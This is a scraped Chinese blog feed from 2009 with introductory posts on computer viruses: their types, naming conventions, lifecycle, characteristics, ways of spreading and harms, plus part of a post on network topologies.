“警告”意味的信息。这些信息不外是叫您不要非法拷贝软件，不然就是显示特定的图形，再不然就是放一段音乐给您
听……。病毒发作后，不是摧毁分区表，导致无法启动，就是直接FORMAT硬盘。也有一部分引导型病毒的“手段”没有
那么狠，不会破坏硬盘数据，只是搞些“声光效果”让您虚惊一场。
引导型病毒几乎清一色都会常驻在内存中，差别只在于内存中的位置。（所谓“常驻”，是指应用程序把要执行的
部分在内存中驻留一份。这样就可不必在每次要执行它的时候都到硬盘中搜寻，以提高效率）。
引导型病毒按其寄生对象的不同又可分为两类，即MBR（主引导区）病毒， BR（引导区）病毒。 MBR病毒也称
为分区病毒，将病毒寄生在硬盘分区主引导程序所占据的硬盘0头0柱面第1个扇区中。典型的病毒有大麻（Stoned）、2
708等。 BR病毒是将病毒寄生在硬盘逻辑0扇区或软盘逻辑0扇区（即0面0道第1个扇区）。典型的病毒有Brain、 小球
病毒等。
顾名思义，文件型病毒主要以感染文件扩展名为 .COM、.EXE和，OVL等可执行程序为主。它的安装必须借助于病毒
的载体程序，即要运行病毒的载体程序，方能把文件型病毒引人内存。已感染病毒的文件执行速度会减缓，甚至完全无
法执行。有些文件遭感染后，一执行就会遭到删除。大多数的文件型病毒都会把它们自己的程序码复制到其宿主的开头
或结尾处。这会造成已感染病毒文件的长度变长，但用户不一定能用DIR命令列出其感染病毒前的长度。 也有部分病毒
是直接改写“受害文件”的程序码，因此感染病毒后文件的长度仍然维持不变。
感染病毒的文件被执行后，病毒通常会趁机再对下一个文件进行感染。有的高明一点的病毒，会在每次进行感染的
时候，针对其新宿主的状况而编写新的病毒码，然后才进行感染，因此，这种病毒没有固定的病毒码—以扫描病毒码的
方式来检测病毒的查毒软件，遇上这种病毒可就一点用都没有了。但反病毒软件随着病毒技术的发展而发展，针对这种
病毒现在也有了有效手段。
大多数文件型病毒都是常驻在内存中的。
文件型病毒分为源码型病毒、嵌入型病毒和外壳型病毒。源码型病毒是用高级语言编写的，若不进行汇编、链接则
无法传染扩散。嵌入型病毒是嵌入在程序的中间，它只能针对某个具体程序，如dBASE病毒。 这两类病毒受环境限制尚
不多见。目前流行的文件型病毒几乎都是外壳型病毒，这类病毒寄生在宿主程序的前面或后面，并修改程序的第一个执
行指令，使病毒先于宿主程序执行，这样随着宿主程序的使用而传染扩散。
文件外壳型病毒按其驻留内存方式可分为高端驻留型、常规驻留型、内存控制链驻留型、设备程序补丁驻留型和不
驻留内存型。
混合型病毒综合系统型和文件型病毒的特性，它的“性情”也就比系统型和文件型病毒更为“凶残”。此种病毒透
过这两种方式来感染，更增加了病毒的传染性以及存活率。不管以哪种方式传染，只要中毒就会经开机或执行程序而感
染其他的磁盘或文件，此种病毒也是最难杀灭的。
引导型病毒相对文件型病毒来讲，破坏性较大，但为数较少，直到90年代中期，文件型病毒还是最流行的病毒。但
近几年情形有所变化，宏病毒后来居上，据美国国家计算机安全协会统计，这位“后起之秀”已占目前全部病毒数量的
80％以上。另外，宏病毒还可衍生出各种变形变种病毒，这种“父生子子生孙”的传播方式实在让许多系统防不胜防，
这也使宏病毒成为威胁计算机系统的“第一杀手”。
随着微软公司Word字处理软件的广泛使用和计算机网络尤其是Internet的推广普及，病毒家族又出现一种新成员，
这就是宏病毒。宏病毒是一种寄存于文档或模板的宏中的计算机病毒。一旦打开这样的文档，宏病毒就会被激活，转移
到计算机上，并驻留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户
打开了感染病毒的文档，宏病毒又会转移到他的计算机上。


病毒的命名方法


1.按病毒发作的时间命名
这种命名取决于病毒表现或破坏系统的发作时间，这类病毒的表现或破坏部分一般为定时炸弹，如"黑色星期五"，
是因为该病毒在某月的13日恰逢星期五时破坏执行的文件而得名；又如"米氏"病毒，其病毒发时间是3月6日，而3月6日
是世界著名艺术家米开朗基罗的生日，于是得名"米开朗基罗"病毒。

2.按病毒发作症状命名
以病毒发作时的表现现象来命名，如"小球"病毒，是因为该病毒病发时在屏幕上出现小球不停地运动而得名；又如
"火炬"病毒，是因为该病毒病发时在屏幕上出现五支闪烁的火炬而得名；再如Yankee病毒，因为该病毒激发时将演奏Y_
ankee Doodle乐曲，于是人们将其命为 Yankee病毒。

3.按病毒自身包含的标志命名
以病毒中出现的字符串、病毒标识、存放位置或病发表现时病毒自身宣布的名称来命名，如"大麻"病毒中含有Mar_
ijunana及Stoned字样，所以人们将该病毒命名为Marijunana(译为"大麻")和Stoned病毒；又如"Liberty"病毒，是因为
该病毒中含有该标识；再如"DiskKiller"病毒，该病毒自称为DiskKiller(磁盘杀手)。CIH病毒是由刘韦麟博士命名的，
因为病毒程序的首位是"CIH"。

4.按病毒发现地命名
以病毒首先发现的地点来命名，如"黑色星期五"又称Jurusalem(耶路撒冷)病毒，是因为该病毒首先在Jurusalem发
现；又如Vienna(维也纳)病毒是首先在维也纳发现的。

5.按病毒的字节长度命名
以病毒传染文件时文件的增加长度或病毒自身代码的长度来命名，如1575、2153、1701、1704、1514、4096等。

国际上对病毒命名的惯例


一般惯例为前缀+病毒名+后缀。前缀表示该病毒发作的操作平台或者病毒的类型，而DOS下的病毒一般是没有前缀的；
病毒名为该病毒的名称及其家族；后缀一般可以不要的，只是以此区别在该病毒家族中各病毒的不同，可以为字母，或者
为数字以说明此病毒的大小。例如：WM.Cap.A，A表示在Cap病毒家族中的一个变种，WM表示该病毒是一个Word宏病毒。下
面我就讲解一下各种前缀的含义：
WM: Word宏病毒，可以在Word6.0和Word95(Word7.0)下传播发作，也可以在Word97(Word8.0)或以上的 Word下传播发
作，但该病毒不是在Word97制作完成的。
W97M: Word97宏病毒，这些是在Word97下制作完成，并只在Word97或以上版本的或以上的Word传播发作。
XM: Excel宏病毒在Excel5.0和Excel95下制作完成并传播发作，同样，此种病毒也可以在 Excel97或以上版本传播发
作。
X97M: 在Excel97下制作完成的Excel宏病毒，此类病毒也可以在Excel5.0和Excel97下传播发作。
XF: Excel程式（Excel Formula）病毒，此类病毒是用Excel4.0把程序片断植入新的Excel文档中的。
AM: 在Access95下制作完成并传播发作的Access的宏病毒。
A97M: 在Access97下制作完成并传播发作的Access的宏病毒。
W95: 顾名思义，这类是Windows95病毒，运行在Windows95操作系统下，当然也可以运行在Windows98下。
Win: Windows3.x病毒，感染Windows3.x操作系统的文件。
W32: 32位Windows病毒，感染所有的32位Widnows平台。
WNT: 同样是32位Windows病毒，但只感染Windows NT操作系统。
HLLC: 高级语言同伴（High Level Language Companion）病毒，他们通常是DOS病毒，通过新建一个附加的文件来传
播。
HLLP: 高级语言寄生（High Level Language Parasitic）病毒，这些通常也是DOS病毒，寄生在主文件中。
HLLO: 高级语言改写（High Level Language Overwriting）病毒，通常是DOS病毒，以病毒代码改写主文件。
Trojan/Troj: 这并不是病毒，只是特洛伊木马，通常装扮成有用的程序，但通常有恶意代码， 特洛伊木马并不会传
染。
VBS: 用Visual Basic Script程序语言编写的病毒。
AOL: 美国在线（AOL）环境下特殊的木马，其目的通常位窃取AOL的密码等信息。
PWSTEAL: 窃取密码等信息的木马。
JAVA: 用JAVA程序语言编写的病毒。
]]> http://78040007.qzone.qq.com/blog/1248928932#comment 134218240 Thu, 30 Jul 2009 04:42:12 GMT http://78040007.qzone.qq.com/blog/1248928932 http://78040007.qzone.qq.com/blog/1248928888 第五节：病毒基本知识之一(第二章)
病毒基本知识
病毒定义
计算机病毒是一个程序，一段可执行码。就像生物病毒一样，计算机病毒有独特的复制能力。计算机病毒可以很快地蔓
延，又常常难以根除。它们能把自身附着在各种类型的文件上。当文件被复制或从一个用户传送到另一个用户时，它们就随
同文件一起蔓延开来。

除复制能力外，某些计算机病毒还有其它一些共同特性：一个被污染的程序能够传送病毒载体。当你看到病毒载体似乎
仅仅表现在文字和图象上时，它们可能也已毁坏了文件、再格式化了你的硬盘驱动或引发了其它类型的灾害。若是病毒并不
寄生于一个污染程序，它仍然能通过占据存贮空间给你带来麻烦，并降低你的计算机的全部性能。

可以从不同角度给出计算机病毒的定义。一种定义是通过磁盘、磁带和网络等作为媒介传播扩散,能“传染” 其他程序
的程序。另一种是能够实现自身复制且借助一定的载体存在的具有潜伏性、传染性和破坏性的程序。还有的定义是一种人为
制造的程序,它通过不同的途径潜伏或寄生在存储媒体（如磁盘、内存）或程序里。当某种条件或时机成熟时,它会自生复制
并传播,使计算机的资源受到不同程序的破坏等等。这些说法在某种意义上借用了生物学病毒的概念,计算机病毒同生物病毒
所相似之处是能够侵入计算机系统和网络,危害正常工作的“病原体”。它能够对计算机系统进行各种破坏,同时能够自我复
制, 具有传染性。
所以, 计算机病毒就是能够通过某种途径潜伏在计算机存储介质（或程序）里, 当达到某种条件时即被激活的具有对计
算机资源进行破坏作用的一组程序或指令集合。计算机病毒的生命周期


计算机病毒的产生过程可分为：程序设计-传播-潜伏-触发、运行-实行攻击。计算机病毒拥有一个生命周期，从生成开
始到完全根除结束。下面我们描述病毒生命周期的各个时期。

开发期：在几年前，制造一个病毒需要计算机编程语言的知识。但是今天有一点计算机编程知识的人都可以制造一个病
毒。通常计算机病毒是一些误人歧途的、试图传播计算机病毒和破坏计算机的个人或组织制造的。

传染期：在一个病毒制造出来后，病毒的编写者将其拷贝并确认其已被传播出去。通常的办法是感染一个流行的程序，
再将其放入BBS站点上、校园和其他大型组织当中分发其复制物。

潜伏期：病毒是自然地复制的。一个设计良好的病毒可以在它活化前长时期里被复制。这就给了它充裕的传播时间。这
时病毒的危害在于暗中占据存储空间。

发作期：带有破坏机制的病毒会在遇至（某一特定条件时发作，一旦遇上某种条件，比如某个日期或出现了用户采取的
某特定行为，病毒就被活化了。没有感染程序的病毒属于没有活化，这时病毒的危害在于暗中占据存储空间。

发现期：这一段并非总是这样做，但通常如此。当一个病毒被检测到并被隔离出来后，它被送到计算机安全协会或反病
毒厂家，在那里病毒被通报和描述给反病毒研究工作者。通常发现病毒是在病毒成为计算机社会的灾难之前完成的。

消化期：在这一阶段，反病毒开发人员修改他们的软件以使其可以检测到新发现的病毒。这段时间的长短取决于开发人
员的素质和病毒的类型。

消亡期：若是所有用户安装了最新版的杀毒软件，那么任何病毒都将被扫除。这样没有什么病毒可以广泛地传播，但有
一些病毒在消失之前有一个很长的消亡期。至今，还没有哪种病毒已经完全消失，但是某些病毒已经在很长时间里不再是一
个重要的威胁了。


计算机病毒的特性


计算机病毒一般具有以下特性：

1．计算机病毒的程序性（可执行性）
计算机病毒与其他合法程序一样，是一段可执行程序，但它不是一个完整的程序，而是寄生在其他可执行程序上，
因此它享有一切程序所能得到的权力。在病毒运行时，与合法程序争夺系统的控制权。计算机病毒只有当它在计算机
内得以运行时，才具有传染性和破坏性等活性。也就是说计算机CPU的控制权是关键问题。 若计算机在正常程序控制
下运行，而不运行带病毒的程序，则这台计算机总是可靠的。在这台计算机上可以查看病毒文件的名字，查看计算机
病毒的代码，打印病毒的代码，甚至拷贝病毒程序，却都不会感染上病毒。反病毒技术人员整天就是在这样的环境下
工作。他们的计算机虽也存有各种计算机病毒的代码，但己置这些病毒于控制之下，计算机不会运行病毒程序，整个
系统是安全的。相反，计算机病毒一经在计算机上运行，在同一台计算机内病毒程序与正常系统程序，或某种病毒与
其他病毒程序争夺系统控制权时往往会造成系统崩溃，导致计算机瘫痪。反病毒技术就是要提前取得计算机系统的控
制权，识别出计算机病毒的代码和行为，阻止其取得系统控制权。反病毒技术的优劣就是体现在这一点上。一个好的
抗病毒系统应该不仅能可靠地识别出已知计算机病毒的代码，阻止其运行或旁路掉其对系统的控制权（实现安全带毒
运行被感染程序），还应该识别出未知计算机病毒在系统内的行为，阻止其传染和破坏系统的行动。
2．计算机病毒的传染性
传染性是病毒的基本特征。在生物界，病毒通过传染从一个生物体扩散到另一个生物体。在适当的条件下，它可
得到大量繁殖，井使被感染的生物体表现出病症甚至死亡。同样，计算机病毒也会通过各种渠道从已被感染的计算机
扩散到未被感染的计算机，在某些情况下造成被感染的计算机工作失常甚至瘫痪。与生物病毒不同的是，计算机病毒
是一段人为编制的计算机程序代码，这段程序代码一旦进入计算机井得以执行，它就会搜寻其他符合其传染条件的程
序或存储介质，确定目标后再将自身代码插入其中，达到自我繁殖的目的。只要一台计算机染毒，如不及时处理，那
么病毒会在这台机子上迅速扩散，其中的大量文件（一般是可执行文件）会被感染。而被感染的文件又成了新的传染
源，再与其他机器进行数据交换或通过网络接触，病毒会继续进行传染。
正常的计算机程序一般是不会将自身的代码强行连接到其他程序之上的。而病毒却能使自身的代码强行传染到一
切符合其传染条件的未受到传染的程序之上。计算机病毒可通过各种可能的渠道，如软盘、计算机网络去传染其他的
计算机。当您在一台机器上发现了病毒时，往往曾在这台计算机上用过的软盘已感染上了病毒，而与这台机器相联网
的其他计算机也许也被该病毒染上了。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。
病毒程序通过修改磁盘扇区信息或文件内容并把自身嵌入到其中的方法达到病毒的传染和扩散。被嵌入的程序叫
做宿主程序。

3．计算机病毒的潜伏性
一个编制精巧的计算机病毒程序，进入系统之后一般不会马上发作，可以在几周或者几个月内甚至几年内隐藏在
合法文件中，对其他系统进行传染，而不被人发现，潜伏性愈好，其在系统中的存在时间就会愈长，病毒的传染范围
就会愈大。
潜伏性的第一种表现是指，病毒程序不用专用检测程序是检查不出来的，因此病毒可以静静地躲在磁盘或磁带里
呆上几天，甚至几年，一旦时机成熟，得到运行机会，就又要四处繁殖、扩散，继续为害。潜伏性的第二种表现是指，
计算机病毒的内部往往有一种触发机制，不满足触发条件时，计算机病毒除了传染外不做什么破坏。触发条件一旦得
到满足，有的在屏幕上显示信息、图形或特殊标识，有的则执行破坏系统的操作，如格式化磁盘、删除磁盘文件、对
数据文件做加密、封锁键盘以及使系统死锁等。

4．计算机病毒的可触发性
病毒因某个事件或数值的出现，诱使病毒实施感染或进行攻击的特性称为可触发性。为了隐蔽自己，病毒必须潜
伏，少做动作。如果完全不动，一直潜伏的话，病毒既不能感染也不能进行破坏，便失去了杀伤力。病毒既要隐蔽又
要维持杀伤力，它必须具有可触发性。病毒的触发机制就是用来控制感染和破坏动作的频率的。病毒具有预定的触发
条件，这些条件可能是时间、日期、文件类型或某些特定数据等。病毒运行时，触发机制检查预定条件是否满足，如
果满足，启动感染或破坏动作，使病毒进行感染或攻击；如果不满足，使病毒继续潜伏。

5．计算机病毒的破坏性
所有的计算机病毒都是一种可执行程序，而这一可执行程序又必然要运行，所以对系统来讲，所有的计算机病毒
都存在一个共同的危害，即降低计算机系统的工作效率，占用系统资源，其具体情况取决于入侵系统的病毒程序。
同时计算机病毒的破坏性主要取决于计算机病毒设计者的目的，如果病毒设计者的目的在于彻底破坏系统的正常
运行的话，那么这种病毒对于计算机系统进行攻击造成的后果是难以设想的，它可以毁掉系统的部分数据，也可以破
坏全部数据并使之无法恢复。
但并非所有的病毒都对系统产生极其恶劣的破坏作用。有时几种本没有多大破坏作用的病毒交叉感染，也会导致系统
崩溃等重大恶果。

6．攻击的主动性
病毒对系统的攻击是主动的，不以人的意志为转移的。也就是说，从一定的程度上讲，计算机系统无论采取多
么严密的保护措施都不可能彻底地排除病毒对系统的攻击，而保护措施充其量是一种预防的手段而已。

7．病毒的针对性
计算机病毒是针对特定的计算机和特定的操作系统的。例如，有针对1BM PC机及其兼容机的，有针对App1e公司
的Macintosh的，还有针对UNIX操作系统的。例如小球病毒是针对IBM PC机及其兼容机上的DOS操作系统的。

8．病毒的非授权性
病毒未经授权而执行。一般正常的程序是由用户调用，再由系统分配资源，完成用户交给的任务。其目的对用户
是可见的、透明的。而病毒具有正常程序的一切特性，它隐藏在正常程序中，当用户调用正常程序时窃取到系统的控
制权，先于正常程序执行，病毒的动作、目的对用户是未知的，是未经用户允许的。

9．病毒的隐蔽性
病毒一般是具有很高编程技巧，短小精悍的程序。通常附在正常程序中或磁盘较隐蔽的地方，也有个别的以隐含
文件形式出现。目的是不让用户发现它的存在。如果不经过代码分析，病毒程序与正常程序是不容易区别开来的。一
般在没有防护措施的情况下，计算机病毒程序取得系统控制权后，可以在很短的时间里传染大量程序。而且受到传染
后，计算机系统通常仍能正常运行，使用户不会感到任何异常，好像不曾在计算机内发生过什么。试想，如果病毒在
传染到计算机上之后，机器马上无法正常运行，那么它本身便无法继续进行传染了。正是由于隐蔽性，计算机病毒得
以在用户没有察觉的情况下扩散并游荡于世界上百万台计算机中。
大部分的病毒的代码之所以设计得非常短小，也是为了隐藏。病毒一般只有几百或1K字节，而 PC机对DOS文件的
存取速度可达每秒几百KB以上，所以病毒转瞬之间便可将这短短的几百字节附着到正常程序之中，使人非常不易察觉。
计算机病毒的隐蔽性表现在两个方面：
一是传染的隐蔽性，大多数病毒在进行传染时速度是极快的，一般不具有外部表现，不易被人发现。让我们设想，
如果计算机病毒每当感染一个新的程序时都在屏幕上显示一条信息“我是病毒程序，我要干坏事了”，那么计算机病
毒早就被控制住了。确实有些病毒非常“勇于暴露自己”，时不时在屏幕上显示一些图案或信息，或演奏一段乐曲。
往往此时那台计算机内已有许多病毒的拷贝了。许多计算机用户对计算机病毒没有任何概念，更不用说心理上的警惕
了。他们见到这些新奇的屏幕显示和音响效果，还以为是来自计算机系统，而没有意识到这些病毒正在损害计算机系
统，正在制造灾难。
二是病毒程序存在的隐蔽性，一般的病毒程序都夹在正常程序之中，很难被发现，而一旦病毒发作出来，往往已
经给计算机系统造成了不同程度的破坏。被病毒感染的计算机在多数情况下仍能维持其部分功能，不会由于一感染上
病毒，整台计算机就不能启动了，或者某个程序一旦被病毒所感染，就被损坏得不能运行了，如果出现这种情况，病
毒也就不能流传于世了。计算机病毒设计的精巧之处也在这里。正常程序被计算机病毒感染后，其原有功能基本上不
受影响，病毒代码附于其上而得以存活，得以不断地得到运行的机会，去传染出更多的复制体，与正常程序争夺系统
的控制权和磁盘空间，不断地破坏系统，导致整个系统的瘫痪。病毒的代码设计得非常精巧而又短小。

10．病毒的衍生性
这种特性为一些好事者提供了一种创造新病毒的捷径。
分析计算机病毒的结构可知，传染的破坏部分反映了设计者的设计思想和设计目的。但是，这可以被其他掌握原
理的人以其个人的企图进行任意改动，从而又衍生出一种不同于原版本的新的计算机病毒（又称为变种）。这就是计
算机病毒的衍生性。这种变种病毒造成的后果可能比原版病毒严重得多。

11．病毒的寄生性（依附性）
病毒程序嵌入到宿主程序中，依赖于宿主程序的执行而生存，这就是计算机病毒的寄生性。病毒程序在侵入到宿
主程序中后，一般对宿主程序进行一定的修改，宿主程序一旦执行，病毒程序就被激活，从而可以进行自我复制和繁
衍。
12．病毒的不可预见性
从对病毒的检测方面来看，病毒还有不可预见性。不同种类的病毒，它们的代码千差万别，但有些操作是共有的
（如驻内存，改中断）。有些人利用病毒的这种共性，制作了声称可查所有病毒的程序。这种程序的确可查出一些新
病毒，但由于目前的软件种类极其丰富，且某些正常程序也使用了类似病毒的操作甚至借鉴了某些病毒的技术。使用
这种方法对病毒进行检测势必会造成较多的误报情况。而且病毒的制作技术也在不断的提高，病毒对反病毒软件永远
是超前的。新一代计算机病毒甚至连一些基本的特征都隐藏了，有时可通过观察文件长度的变化来判别。然而，更新
的病毒也可以在这个问题上蒙蔽用户，它们利用文件中的空隙来存放自身代码，使文件长度不变。许多新病毒则采用
变形来逃避检查，这也成为新一代计算机病毒的基本特征。

13．计算机病毒的欺骗性
计算机病毒行动诡秘，计算机对其反应迟钝，往往把病毒造成的错误当成事实接受下来，故它很容易获得成功。

14．计算机病毒的持久性
即使在病毒程序被发现以后，数据和程序以至操作系统的恢复都非常困难。特别是在网络操作情况下，由于病毒
程序由一个受感染的拷贝通过网络系统反复传播，使得病毒程序的清除非常复杂。


计算机病毒的传播途径


第一种途径
&127;&127;&127;&127;
&127;&127;&127; 通过不可移动的计算机硬件设备进行传播，这些设备通常有计算机的专用ASIC芯片和硬盘等。这种病毒虽然极少，
但破坏力却极强，目前尚没有较好的检测手段对付。

第二种途径

&127;&127;&127; 通过移动存储设备来传播这些设备包括软盘、磁带等。在移动存储设备中，软盘是使用最广泛移动最频繁的存储
介质，因此也成了计算机病毒寄生的“温床”。目前，大多数计算机都是从这类途径感染病毒的。

第三种途径

&127;&127;&127; 通过计算机网络进行传播。现代信息技术的巨大进步已使空间距离不再遥远，“相隔天涯，如在咫尺”，但也为
计算机病毒的传播提供了新的“高速公路”。计算机病毒可以附着在正常文件中通过网络进入一个又一个系统， 国内计
算机感染一种“进口”病毒已不再是什么大惊小怪的事了。在我们信息国际化的同时， 我们的病毒也在国际化。估计以
后这种方式将成为第一传播途径。

第四种途径

&127;&127;&127; 通过点对点通信系统和无线通道传播。目前，这种传播途径还不是十分广泛，但预计在未来的信息时代，这种途
径很可能与网络传播途径成为病毒扩散的两大“时尚渠道”。




计算机病毒的危害及症状


在计算机病毒出现的初期，说到计算机病毒的危害，往往注重于病毒对信息系统的直）接破坏作用，比如格式化
硬盘、删除文件数据等，并以此来区分恶性病毒和良性病毒。其实这些只是病毒劣迹的一部分，随着计算机应用的发
展，人们深刻地认识到凡是病毒都可能对计算机信息系统造成严重的破坏。

计算机病毒的主要危害
计算机病毒的主要危害有：

1．病毒激发对计算机数据信息的直接破坏作用
大部分病毒在激发的时候直接破坏计算机的重要信息数据，所利用的手段有格式化磁盘、改写文件分配表和目录
区、删除重要文件或者用无意义的“垃圾”数据改写文件、破坏CMO5设置等。
磁盘杀手病毒（D1SK KILLER），内含计数器，在硬盘染毒后累计开机时间48小时内激发，激发的时候屏幕上显
示“Warning!! Don'tturn off power or remove diskette while Disk Killer is Prosessing！” （警
告！D1SK KILLER ll1在工作，不要关闭电源或取出磁盘），改写硬盘数据。被D1SK KILLER破坏的硬盘可以用杀毒
软件修复，不要轻易放弃。

2．占用磁盘空间和对信息的破坏
寄生在磁盘上的病毒总要非法占用一部分磁盘空间。
引导型病毒的一般侵占方式是由病毒本身占据磁盘引导扇区，而把原来的引导区转移到其他扇区，也就是引导型
病毒要覆盖一个磁盘扇区。被覆盖的扇区数据永久性丢失，无法恢复。
文件型病毒利用一些DOS功能进行传染，这些DOS功能能够检测出磁盘的未用空间，把病毒的传染部分写到磁盘的
未用部位去。所以在传染过程中一般不破坏磁盘上的原有数据，但非法侵占了磁盘空间。一些文件型病毒传染速度很
快，在短时间内感染大量文件，每个文件都不同程度地加长了，就造成磁盘空间的严重浪费。

3．抢占系统资源
除VIENNA、CASPER等少数病毒外，其他大多数病毒在动态下都是常驻内存的，这就必然抢占一部分系统资源。病
毒所占用的基本内存长度大致与病毒本身长度相当。病毒抢占内存，导致内存减少，一部分软件不能运行。除占用内
存外，病毒还抢占中断，干扰系统运行。计算机操作系统的很多功能是通过中断调用技术来实现的。病毒为了传染激
发，总是修改一些有关的中断地址，在正常中断过程中加入病毒的“私货”，从而干扰了系统的正常运行。

4．影响计算机运行速度
病毒进驻内存后不但干扰系统运行，还影响计算机速度，主要表现在：
（1）病毒为了判断传染激发条件，总要对计算机的工作状态进行监视， 这相对于计算机的正常运行状态既多余
又有害。
（2）有些病毒为了保护自己，不但对磁盘上的静态病毒加密，而且进驻内存后的动态病毒也处在加密状态，CPU
每次寻址到病毒处时要运行一段解密程序把加密的病毒解密成合法的CPU指令再执行； 而病毒运行结束时再用一段程
序对病毒重新加密。这样CPU额外执行数千条以至上万条指令。
（3）病毒在进行传染时同样要插入非法的额外操作，特别是传染软盘时不但计算机速度明显变慢， 而且软盘正
常的读写顺序被打乱，发出刺耳的噪声。

5．计算机病毒错误与不可预见的危害
计算机病毒与其他计算机软件的一大差别是病毒的无责任性。编制一个完善的计算机软件需要耗费大量的人力、
物力，经过长时间调试完善，软件才能推出。但在病毒编制者看来既没有必要这样做，也不可能这样做。很多计算机
病毒都是个别人在一台计算机上匆匆编制调试后就向外抛出。反病毒专家在分析大量病毒后发现绝大部分病毒都存在
不同程度的错误。
错误病毒的另一个主要来源是变种病毒。有些初学计算机者尚不具备独立编制软件的能力，出于好奇或其他原因
修改别人的病毒，造成错误。
计算机病毒错误所产生的后果往往是不可预见的，反病毒工作者曾经详细指出黑色星期五病毒存在9处错误， 乒
乓病毒有5处错误等。但是人们不可能花费大量时间去分析数万种病毒的错误所在。 大量含有未知错误的病毒扩散传
播，其后果是难以预料的。

6．计算机病毒的兼容性对系统运行的影响
兼容性是计算机软件的一项重要指标，兼容性好的软件可以在各种计算机环境下运行，反之兼容性差的软件则对
运行条件“挑肥拣瘦”，要求机型和操作系统版本等。病毒的
编制者一般不会在各种计算机环境下对病毒进行测试，因此病毒的兼容性较差，常常导致
死机。
7．计算机病毒给用户造成严重的心理压力
据有关计算机销售部门统计，计算机售后用户怀疑“计算机有病毒”而提出咨询约占售后服务工作量的60％以上。
经检测确实存在病毒的约占70％，另有30％情况只是用户怀疑，而实际上计算机并没有病毒。那么用户怀疑病毒的理
由是什么呢？多半是出现诸如计算机死机、软件运行异常等现象。这些现象确实很有可能是计算机病毒造成的。但又
不全是，实际上在计算机工作“异常”的时候很难要求一位普通用户去准确判断是否是病毒所为。大多数用户对病毒
采取宁可信其有的态度，这对于保护计算机安全无疑是十分必要的，然而往往要付出时间、金钱等方面的代价。仅仅
怀疑病毒而冒然格式化磁盘所带来的损失更是难以弥补。不仅是个人单机用户，在一些大型网络系统中也难免为甄别
病毒而停机。总之计算机病毒像“幽灵”一样笼罩在广大计算机用户心头，给人们造成巨大的心理压力，极大地影响
了现代计算机的使用效率，由此带来的无形损失是难以估量的。
]]> http://78040007.qzone.qq.com/blog/1248928888#comment 134218240 Thu, 30 Jul 2009 04:41:28 GMT http://78040007.qzone.qq.com/blog/1248928888 http://78040007.qzone.qq.com/blog/1248928840
(1) 总线型：采用一个公用通道作为传输媒体，所有站点都通过相应的硬件接口直接连接到公用信道上，这一公用信道称为总线
特点：

(1) 所有站点发送的信息都通过该公用信道传播

(2) 某一时刻只允许一个站点向信道上发送数据（且数据分组中携带有目的地址）

(3) 信道上的数据能被其他所有站点接收，且各站点识别分组携带的目的地址，以确定是复制，分组，还是丢弃

(2) 星型：每一个站点直接与一个公共的中心节点连接

中心节点的操作一般有两种方法：

a. 中心节点以广播式方式来运作，典型的设备是集线器 (HUB)

b. 中心节点以交换方式来运作

典型设备是专用交换机 (PBX)

(3) 环型：由站点和链路组成闭合环

特点：数据沿环路单向传输，切绕环行驶一周，回到源站点。 4) 树型型：是星型的扩展，树型网络是分层结构，具有根节点和分支节点
特点：适用于分级管理和控制系统
(5) 混合型：是将传统的总线型网络结构与星型网络结构进行有机结合。
注：混合型 ( 分布式，集散型 ) 网络结构特别使用与一个学校、企业、工厂等各个办公楼分散的情况
(5) 其他型：
a. 双环型 b. 拓展星型 c. 不规则型 d. 完全网状型 e. 蜂窝型 ]]> http://78040007.qzone.qq.com/blog/1248928840#comment 134218240 Thu, 30 Jul 2009 04:40:40 GMT http://78040007.qzone.qq.com/blog/1248928840